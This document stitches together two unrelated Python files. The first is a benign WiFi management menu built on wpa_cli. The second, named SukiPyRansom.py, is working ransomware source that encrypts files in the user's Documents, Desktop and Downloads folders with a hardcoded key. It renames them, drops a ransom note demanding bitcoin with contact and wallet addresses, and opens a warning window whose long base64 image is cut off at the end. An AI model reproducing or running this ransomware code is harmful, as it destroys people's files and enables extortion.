etdn_thread = None #Well-hidden global
def enable_temp_disabled_networks():
global etdn_thread
if not etdn_thread:
etdn_thread = Thread(target=etdn_runner)
etdn_thread.daemon = True
etdn_thread.start()
def etdn_runner():
global etdn_thread
saved_networks = wpa_cli.list_configured_networks()
for network in saved_networks:
if network["flags"] == "[TEMP-DISABLED]":
logger.warning("Network {} is temporarily disabled, re-enabling".format(network["ssid"]))
try:
enable_network(network["network_id"])
except Exception as e:
logger.error(format_exc())
logger.exception(e)
etdn_thread = None
def scan(delay = True, silent = False):
delay = 1 if delay else 0
try:
wpa_cli.initiate_scan()
enable_temp_disabled_networks()
except wpa_cli.WPAException as e:
if e.code=="FAIL-BUSY":
if not silent:
Printer("Still scanning...", i, o, 1)
else:
raise
else:
if not silent:
Printer("Scanning...", i, o, 1)
finally:
sleep(delay)
def reconnect():
try:
w_status = wpa_cli.connection_status()
except:
return ["wpa_cli fail".center(o.cols)]
ip = w_status.get('ip_address', None)
ap = w_status.get('ssid', None)
if not ap:
Printer("Not connected!", i, o, 1)
return False
id = w_status.get('id', None)
if not id:
logger.error("Current network {} is not in configured network list!".format(ap))
return False
disable_network(id)
scan()
enable_network(id)
return True
def status_refresher_data():
try:
w_status = wpa_cli.connection_status()
except:
return ["wpa_cli fail".center(o.cols)]
#Getting data
state = w_status['wpa_state']
ip = w_status.get('ip_address', 'None')
ap = w_status.get('ssid', 'None')
#Formatting strings for screen width
if len(ap) > o.cols: #AP doesn't fit on the screen
ap = ellipsize(ap, o.cols)
if o.cols >= len(ap) + len("SSID: "):
ap = "SSID: "+ap
ip_max_len = 15 #3x4 digits + 3 dots
if o.cols >= ip_max_len+4: #disambiguation fits on the screen
ip = "IP: "+ip
data = [ap.center(o.cols), ip.center(o.cols)]
#Formatting strings for screen height
#Additional state info
if o.rows > 2:
data.append(("St: "+state).center(o.cols))
#Button usage tips - we could have 3 rows by now, can we add at least 3 more?
if o.rows >= 6:
empty_rows = o.rows-6 #ip, ap, state and two rows we'll add
for i in range(empty_rows): data.append("") #Padding
data.append("ENTER: more info".center(o.cols))
data.append("UP: reconnect".center(o.cols))
data.append("RIGHT: rescan".center(o.cols))
return data
def status_monitor():
keymap = {"KEY_ENTER":wireless_status, "KEY_RIGHT":lambda: scan(False), "KEY_UP":lambda: reconnect()}
refresher = Refresher(status_refresher_data, i, o, 0.5, keymap, "Wireless monitor")
refresher.activate()
def wireless_status():
w_status = wpa_cli.connection_status()
state = w_status['wpa_state']
status_menu_contents = [[["state:", state]]] #State is an element that's always there, let's see possible states
if state == 'COMPLETED':
#We have bssid, ssid and key_mgmt at least
status_menu_contents.append(['SSID: '+w_status['ssid']])
status_menu_contents.append(['BSSID: '+w_status['bssid']])
key_mgmt = w_status['key_mgmt']
status_menu_contents.append([['Security:', key_mgmt]])
#If we have WPA in key_mgmt, we also have pairwise_cipher and group_cipher set to something other than NONE so we can show them
if key_mgmt != 'NONE':
try: #What if?
group = w_status['group_cipher']
pairwise = w_status['pairwise_cipher']
status_menu_contents.append([['Group/Pairwise:', group+"/"+pairwise]])
except:
pass
elif state in ['AUTHENTICATING', 'SCANNING', 'ASSOCIATING']:
pass #These states don't have much information
#In any case, we might or might not have IP address info
status_menu_contents.append([['IP address:',w_status['ip_address'] if 'ip_address' in w_status else 'None']])
#We also always have WiFi MAC address as 'address'
status_menu_contents.append(['MAC: '+w_status['address']])
status_menu = Menu(status_menu_contents, i, o, "Wireless status menu", entry_height=2)
status_menu.activate()
def change_interface():
#This function builds a menu out of all the interface names, each having a callback to show_if_function with interface name as argument
menu_contents = []
interfaces = wpa_cli.get_interfaces()
for interface in interfaces:
menu_contents.append([interface, lambda x=interface: change_current_interface(x)])
interface_menu = Menu(menu_contents, i, o, "Interface change menu")
interface_menu.activate()
def change_current_interface(interface):
try:
wpa_cli.set_active_interface(interface)
except wpa_cli.WPAException:
Printer(['Failed to change', 'interface'], i, o, skippable=True)
else:
Printer(['Changed to', interface], i, o, skippable=True)
finally:
raise MenuExitException
def save_changes():
try:
wpa_cli.save_config()
except wpa_cli.WPAException:
Printer(['Failed to save', 'changes'], i, o, skippable=True)
else:
Printer(['Saved changes'], i, o, skippable=True)
saved_networks = None #I'm a well-hidden global
def manage_networks():
global saved_networks
saved_networks = wpa_cli.list_configured_networks()
network_menu_contents = []
#As of wpa_supplicant 2.3-1, header elements are ['network id', 'ssid', 'bssid', 'flags']
for num, network in enumerate(saved_networks):
network_menu_contents.append(["{0[network id]}: {0[ssid]}".format(network), lambda x=num: saved_network_menu(saved_networks[x])])
network_menu = Menu(network_menu_contents, i, o, "Saved network menu", catch_exit=False)
network_menu.activate()
def saved_network_menu(network_info):
global saved_networks
id = network_info['network id']
bssid = network_info['bssid']
network_status = network_info["flags"] if network_info["flags"] else "[ENABLED]"
network_info_contents = [
[network_status],
["Select", lambda x=id: select_network(x)],
["Enable", lambda x=id: enable_network(x)],
["Disable", lambda x=id: disable_network(x)],
["Remove", lambda x=id: remove_network(x)],
["Set password", lambda x=id: set_password(x)],
["BSSID", lambda x=bssid: Printer(x, i, o, 5, skippable=True)]]
network_info_menu = Menu(network_info_contents, i, o, "Wireless network info", catch_exit=False)
network_info_menu.activate()
#After menu exits, we'll request the status again and update the network list
saved_networks = wpa_cli.list_configured_networks()
def select_network(id):
try:
wpa_cli.select_network(id)
except wpa_cli.WPAException:
Printer(['Failed to', 'select network'], i, o, skippable=True)
else:
wpa_cli.save_config()
Printer(['Selected network', str(id)], i, o, skippable=True)
def enable_network(id):
try:
wpa_cli.enable_network(id)
except wpa_cli.WPAException:
Printer(['Failed to', 'enable network'], i, o, skippable=True)
else:
wpa_cli.save_config()
Printer(['Enabled network', str(id)], i, o, skippable=True)
def disable_network(id):
try:
wpa_cli.disable_network(id)
except wpa_cli.WPAException:
Printer(['Failed to', 'disable network'], i, o, skippable=True)
else:
wpa_cli.save_config()
Printer(['Disabled network', str(id)], i, o, skippable=True)
def remove_network(id):
want_to_remove = DialogBox("yn", i, o, message="Remove network?").activate()
if not want_to_remove:
return
try:
wpa_cli.remove_network(id)
except wpa_cli.WPAException:
Printer(['Failed to', 'remove network'], i, o, skippable=True)
else:
wpa_cli.save_config()
Printer(['Removed network', str(id)], i, o, skippable=True)
raise MenuExitException
def set_password(id):
input = UniversalInput(i, o, message="Password:", name="WiFi password enter UI element")
password = input.activate()
if password is None:
return False
wpa_cli.set_network(id, 'psk', '"{}"'.format(password))
wpa_cli.save_config()
Printer(["Password entered"], i, o, 1)
def callback():
#A function for main menu to be able to dynamically update
def get_contents():
current_interface = wpa_cli.get_current_interface()
return [["Status", status_monitor],
["Current: {}".format(current_interface), change_interface],
["Scan", scan],
["Networks", show_scan_results],
["Saved networks", manage_networks]]
#Now testing if we actually can connect
try:
get_contents()
except OSError as e:
if e.errno == 2:
Printer(["Do you have", "wpa_cli?"], i, o, 3, skippable=True)
return
else:
raise e
except wpa_cli.WPAException:
Printer(["Do you have", "wireless cards?", "Is wpa_supplicant", "running?"], i, o, 3, skippable=True)
return
else:
Menu([], i, o, "wpa_cli main menu", contents_hook=get_contents).activate()
def init_app(input, output):
global i, o
i = input; o = output
|
SukiPyRansom.py | from tkinter import *
from tkinter.ttk import *
import os, time, threading, base64, sys, random
from cryptography.fernet import Fernet
from os import listdir
from os.path import isfile, join, isdir
paths = ["//Documents", "//Desktop", "//Downloads"]
script_dir = os.path.abspath(sys.argv[0]).split("\\")
script = script_dir[-1]
main_path = os.environ['USERPROFILE']
warn_message = ("""YOUR FILES HAVE BEEN ENCRYPTED !
TO RECOVER YOUR FILES SEND US 10$ BITCOIN
AND SEND THE PAY CONFIRMATION WITH YOUR
TASK NUMBER TO : h3xv1ss1on@protonmail.com
BITCOIN : 1782x9AtVCQgv6GPjb9uHj1EoFhQocgEMs
-Suki@Yosoevsky""")
def pass_gen(lenght, action):
lower = "abcdefghijklmnoqrstuvwxyz"
upper = lower.upper()
numbers = "0123456789"
symbols = "[]{}()*;/,._-"
if action == "with":
mix = lower + upper + numbers + symbols
if action == "without":
mix = lower + upper + numbers
lenght = lenght
password = "".join(random.sample(mix, lenght))
return password
key = "koWFCjKg3wd1MRkOTpIEjcBzv0vYY9qOsEypY33sayE="
''' key for testing only you can use Cryptography module to generate one !'''
extension = ".Suki"
def get_files_list(mypath):
files_list = [f for f in listdir(mypath) if isfile(join(mypath, f))]
return files_list
def get_desktop_files():
path = os.environ['USERPROFILE'] + "\\Desktop"
desktop = []
files = []
def get_folder_list(mypath):
files_list = [f for f in listdir(mypath) if isdir(join(mypath, f))]
return files_list
for folder in get_folder_list(path):
desktop.append(path + "\\" + folder)
for p in desktop:
for i in get_files_list(p):
files.append(p + "\\" + i)
return files
def encrypt(file, key):
f = Fernet(key)
cipher = f.encrypt(file)
return cipher
for path in paths:
os.chdir(main_path + path)
current_directory = os.getcwd()
warn = open("warning.txt", "w+")
warn.write(warn_message)
for file_name in get_files_list(current_directory):
if file_name == script or file_name == "warning.txt":
pass
else:
with open(file_name, "rb") as file:
file = base64.b64encode(file.read())
try:
data = encrypt(file, key)
dest = open(file_name, "wb")
dest.write(data)
dest.close()
os.rename(file_name, file_name + extension)
except:
pass
for file_name in get_desktop_files():
if file_name == script or file_name == "warning.txt":
pass
else:
with open(file_name, "rb") as file:
file = base64.b64encode(file.read())
try:
data = encrypt(file, key)
dest = open(file_name, "wb")
dest.write(data)
dest.close()
os.rename(file_name, file_name + extension)
except:
pass
class mainwindow(Tk):
def __init__(self, special_key):
Tk.__init__(self)
self.title(string="Warning!!!")
self.resizable(0, 0)
self.configure(background='black')
self.style = Style()
self.style.theme_use("clam")
self.special_key = special_key
photo_code = '''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